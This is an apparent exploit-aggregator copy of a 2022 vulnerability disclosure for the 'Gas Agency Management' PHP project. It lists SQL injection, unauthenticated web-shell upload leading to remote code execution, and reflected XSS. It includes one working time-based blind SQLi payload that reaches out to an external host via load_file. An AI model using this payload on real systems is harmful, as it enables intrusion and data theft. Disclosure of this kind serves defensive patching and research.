Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022080051

Below is a copy:

Gas Agency Management 2022 SQL Injection / XSS / Shell Upload
## Title: Gas Agency Management-2022 by Mayuri K - SQLi+FU-RCE+XSS
## Author: nu11secur1ty
## Date: 08.12.2022
## Vendor Homepage: https://www.mayurik.com/#download_section
## Software Link-0:
https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html
## Software Link-1:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022/Docs/gasmark.zip


## Description:
The Gas Agency Management-2022 by Mayuri K suffers from multiple
vulnerabilities, which means this project must be deprecated
immediately!

1. - SQLi: the parameter username is vulnerable to time-based blind
(query SLEEP) injection - not sanitizing well.
2. - Unauthenticated file upload - not sanitizing upload function -
possible to upload .php extension files on photo section, for the
customers.
3. - XSS-reflected in the section adds customer in address function.
4. - Web shell file upload - unauthenticated extension file upload, in
this case, is PHP web shell uploader. After this, the malicious user
can execute the already   uploaded file remotely, and he can destroy
completely this flawed system.
5. - STATUS: For termination of the project.

[+]Payloads:

```mysql
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=mxiusQzi'+(select
load_file('\\\\alzg6yrkl2xieezgaz9zqnya91fu3lw9ncb4yumj.tupaciganka.com\\jfe'))+''
AND (SELECT 9964 FROM (SELECT(SLEEP(5)))bVfa)--
FygL&password=r8H!r2a!U2&login=
---
```
[+]Unauthenticated Upload:
- - - in the video:https://streamable.com/opqz3n

[+]XSS-Reflected:
- - - in the video:https://streamable.com/opqz3n

[+]RCE:
- - - in the video:https://streamable.com/opqz3n

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)

## Proof and Exploit:
[href](https://streamable.com/opqz3n)


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.